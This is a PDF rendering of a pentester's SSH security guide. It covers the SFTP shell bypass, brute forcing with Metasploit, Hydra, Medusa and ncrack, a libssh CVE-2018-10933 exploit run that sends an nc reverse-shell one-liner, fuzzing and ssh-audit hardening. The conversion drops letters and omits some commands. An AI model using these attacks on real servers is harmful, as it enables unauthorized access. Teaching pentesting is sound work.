SSH Pentesting Guide PDF
SSH Pentesting Guide PDF
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
967
SHARES
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
SSH Pentesting Guide
If you’d like to suggest an amendment or contribute to this article send us an email through to
[email protected]. We’ll also do our best to propagate additions and suggestions from social
media!
Turgensec provides cost e ective bespoke security and security testing to individuals and
organizations.
Our service o erings include penetration testing, open source counterintelligence, open source
intelligence and digital asset management. Contact us by clicking here.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Table of Contents [ show ]
SSH is a secure remote shell protocol used for operating network services
securely over an unsecured network. The default SSH port is 22, it’s common to see it open on
servers on Internet or Intranets.
SFTP is the SSH File Transfer Protocol, a protocol used to transfer les over an SSH connection. Most
SSH implementations are also supporting SFTP.
SSH servers/libs
The most famous and common SSH server and client is openSSH (OpenBSD Secure Shell). It’s a
strong implementation which is well maintained and was rst released in 1999. So this is the
implementation you will see the most often on BSD, Linux and even Windows as it is shipped in
Windows since Windows 10.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
But openSSH is not the only implementation, here are other ones:
SSH servers:
openSSH – OpenBSD SSH, shipped in BSD, Linux distributions and Windows since Windows 10
Dropbear – SSH implementation for environments with low memory and processor resources, shipped in
OpenWrt
PuTTY – SSH implementation for Windows, the client is commonly used but the use of the server is
rarer
CopSSH – implementation of OpenSSH for Windows
libssh – multiplatform C library implementing the SSHv2 protocol with bindings in Python, Perl and R;
it’s used by KDE for sftp and by GitHub for the git SSH infrastructure
wolfSSH – SSHv2 server library written in ANSI C and targeted for embedded, RTOS, and resource-
constrained environments
Apache MINA SSHD – Apache SSHD java library is based on Apache MINA
paramiko – Python SSHv2 protocol library
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
By default most SSH server implementation will allow root login, it is advised to disable it because if
the credentials of this accounts leaks, attackers will get administrative privileges directly and this will
also allow attackers to conduct bruteforce attacks on this account.
Another common SSH miscon guration is often seen in SFTP con guration. Most of the time when
creating a SFTP server the administrator want users to have a SFTP access to share les but not to
get a remote shell on the machine. So they think that creating a user, attributing him a placeholder
shell (like /usr/bin/nologin or /usr/bin/false) and chrooting him in a jail is enough to avoid a
shell access or abuse on the whole le system. But they are wrong, a user can ask to execute a
command right after authentication before it’s default command or shell is executed. So to bypass
the placeholder shell that will deny shell access, one only has to ask to execute a command (eg.
/bin/bash) before, just by doing:
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
$ ssh -v [email protected] id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 192.168.1.94 ([192.168.1.94]:22).
debug1: channel 0: new [client-session]
debug1: Requesting [email protected]
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype [email protected] want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype [email protected] reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0
Here is an example of secure SFTP con guration (/etc/ssh/sshd_config – openSSH) for the user noraj:
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Match User noraj
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no
This con guration will allow only SFTP: disabling shell access by forcing the start command and disabling
TTY access but also disabling all kind of port forwarding or tunneling.
Authentication methods
On high security environment it’s a common practice to enable only key-based or two factor
authentication rather than the simple factor password based authentication. But often the stronger
authentication methods are enabled without disabling the weaker ones. A frequent case is enabling
publickey on openSSH con guration and setting it as the default method but not disabling
password. So by using the verbose mode of the SSH client an attacker can see that a weaker method
is enabled:
$ ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
For example if an authentication failure limit is set and you never get the chance to reach the password
method, you can use the PreferredAuthentications option to force to use this method.
Review the SSH server con guration is necessary to check that only expected
methods are authorized. Using the verbose mode on the client can help to see
the e ectiveness of the con guration.
Attack showcase
Now we’ll see a set of attack examples that you can reproduce on some SSH server implementations.
I will now run through an improved variation of “brute forcing” an SSH user password with a password
dictionary using four tools: the metasploit framework, hydra, medusa and ncrack.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
In all cases we will target the machine 192.168.1.94, on port 22 and will bruteforce only the password of
the user noraj.
Read the help messages given below if you don’t understand an argument/option.
Metasploit
With Metasploit:
Matching Modules
================
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Module options (auxiliary/scanner/ssh/ssh_login):
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords
separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for
all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all
attempts
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
[*] Command shell session 1 opened (192.168.1.83:37291 -> 192.168.1.94:22) at 2020-01-
02 21:33:33 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Hydra
With Hydra:
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Extract of the help message:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
service the service to crack (see below for supported protocols)
Medusa
With Medusa:
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
-P [FILE] : File containing passwords to test
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
Ncrack
With ncrack:
Ncrack finished.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Exploit – LibSSH RCE
CVE-2018-10933 is the reference for a vulnerability impacting libssh library. This vulnerability allows
unauthorized access by bypassing the authentication.
libssh versions 0.6 and above have an authentication bypass vulnerability in the server code. By presenting
the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST
message which the server would expect to initiate authentication, the attacker could successfully
authentciate without any credentials. Advisory
When you nd a vulnerable version with nmap you should see something like that:
searchsploit (the tool used to locally browse the Exploit-DB) shows the existing exploits available for
libssh.
searchsploit libssh
---------------------------------------------------------------------------------------
----- ----------------------------------------
Exploit Title
| Path
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
| (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------
----- ----------------------------------------
LibSSH 0.7.6 / 0.8.4 - Unauthorized Access
| exploits/linux/remote/46307.py
libSSH - Authentication Bypass
| exploits/linux/remote/45638.py
---------------------------------------------------------------------------------------
----- ----------------------------------------
Shellcodes: No Result
So we can use the exploit to execute a command on the target in order to con rm it is working.
First we start the listener on our machine: sudo ncat -nlp 80.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
python /usr/share/exploitdb/exploits/linux/remote/46307.py 192.168.1.94 22 "rm
/tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.100 80 >/tmp/f"
Fuzzing
It’s possible to use a script like sshfuzz.pl to automatically fuzz a live SSH server whatever is the
implementation.
It has the advantage of being simple but it’s not very targeted so it’s going to take a lot of time and miss a
lot of results.
Install dependencies and launch the script is as easy as writing those two lines:
$ cpan Net::SSH2
$ ./sshfuzz.pl -H 192.168.1.94 -P 22 -u noraj -p noraj
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Another automated approach that will also work on any live SSH server is to use the metasploit module
auxiliary/fuzzers/ssh/ssh_version_2:
Using those tools is easy but you have low chance of nding something exploitable.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
If you want to nd more signi cant results and have the time to familiarize yourself with the targeted
implementation you can opt for a manual approach.
Here the technique is to use an advanced generic fuzzer on a self-run SSH server and modify the source
code to optimize the test execution time. So it will require to con gure the fuzzer, con gure and build the
targeted implementation, detecting the crashes, reducing the use of resource-intensive functions to make
the fuzz faster, increasing coverage, create input test-cases and input dictionaries and having a deep
understanding of the SSH protocol and of the implementation.
Here is an example of Vegard Nossum Fuzzing the OpenSSH daemon using AFL.
“HASSH” is a network ngerprinting standard which can be used to identify speci c Client and Server
SSH implementations. The ngerprints can be easily stored, searched and shared in the form of an
MD5 ngerprint.
HASSH is a standard that helps blue teams to detect, control and investigate brute force or credential
stu ng password attempts, ex ltration of data, network discovery and lateral movement, etc.
ssh-audit is an SSH server auditing tool (banner, key exchange, encryption, mac, compression, compatibility,
security, etc).
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
It’s handy for professional pentesters to quickly detect the target version and knowing which algorithms are
available on the remote server to be able to give algorithm recommendations to the customer.
Example of use:
$ ssh-audit 192.168.1.94
# general
(gen) banner: SSH-2.0-OpenSSH_7.9
(gen) software: OpenSSH 7.9
(gen) compatibility: OpenSSH 7.3+, Dropbear SSH 2016.73+
(gen) compression: enabled ([email protected])
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
`- [info] available since OpenSSH 5.7,
Dropbear SSH 2013.62
(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus
(possibly weak)
`- [info] available since OpenSSH 4.4
(kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3,
Dropbear SSH 2016.73
(kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
(kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3,
Dropbear SSH 2016.73
(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
`- [info] available since OpenSSH 3.9,
Dropbear SSH 0.53
# host-key algorithms
(key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
(key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
(key) ssh-rsa -- [info] available since OpenSSH 2.5.0,
Dropbear SSH 0.28
(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
`- [warn] using weak random number
generator could reveal the key
`- [info] available since OpenSSH 5.7,
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Dropbear SSH 2013.62
(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
`- [warn] using small 64-bit tag size
`- [info] available since OpenSSH 4.7
(mac) [email protected] -- [warn] using encrypt-and-MAC mode
`- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
`- [info] available since OpenSSH 5.9,
Dropbear SSH 2013.56
(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
`- [info] available since OpenSSH 5.9,
Dropbear SSH 2013.56
(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
`- [warn] using weak hashing algorithm
`- [info] available since OpenSSH 2.1.0,
Dropbear SSH 0.28
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
(rec) [email protected] -- mac algorithm to remove
(rec) -hmac-sha2-256 -- mac algorithm to remove
(rec) [email protected] -- mac algorithm to remove
(rec) -hmac-sha1 -- mac algorithm to remove
(rec) [email protected] -- mac algorithm to remove
(rec) [email protected] -- mac algorithm to remove
Though (beyond this article) not much really exists for SSH speci c exploit development, many of the same
general trends apply. Many books & articles have covered the development of zero-day stack & heap-based
exploits in detail, some of which are covered in the appropriate sections of our books and resources page.
(TLDR; Corelan & Shellcoders Hackers Handbook are still the best).
Some of the most notable remote SSH exploits of recent times are listed below as a quick non-
comprehensive shortlist –
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Mozilla is giving recommendations to help secure an OpenSSH server in this reference guide.
Best current practices regarding secure SSH con guration are also given in a guide called Applied Crypto
Hardening. Currently examples of con guration are given for OpenSSH, Cisco ASA and Cisco IOS. The source
of the guide is also available.
Pivoting
In 2019, I published an article about network pivoting Etat de l’art du pivoting réseau en 2019 [fr-FR].
This article addresses the following topics that are related to SSH:
Those methods are helpful for a professional red teamer to make lateral movement in the target network.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
This is a community article. If you want to chat to other cyber security experts, contribute articles or
collaborate with us, join our Discord channel by clicking here.
My name is Alexandre ZANNI aka noraj. I’m a Cybersecurity engineer, security auditor, pentester and
ethical hacker. Also I’m a sta member of the RTFM association and a developer of BlackArch Linux.
Link – pwn.by/noraj
COMMENTS
L E AV E A R E P LY
Your email address will not be published. Required elds are marked *
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Comment*
Name*
Email*
Website
Save my name, email, and website in this browser for the next time I comment.
Post Comment
SEARCH
Search …
Search
TURGENSEC
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Community
Breaches
OSINT & Social Engineering
Research and Development
Business Resources
Pentesting
TurgenSec
Services
Exosystem Monitoring
Intelligence Acquisition
Data Shadow
Research
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Table of Contents [ hide ]
© 2020 by TurgenSec
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD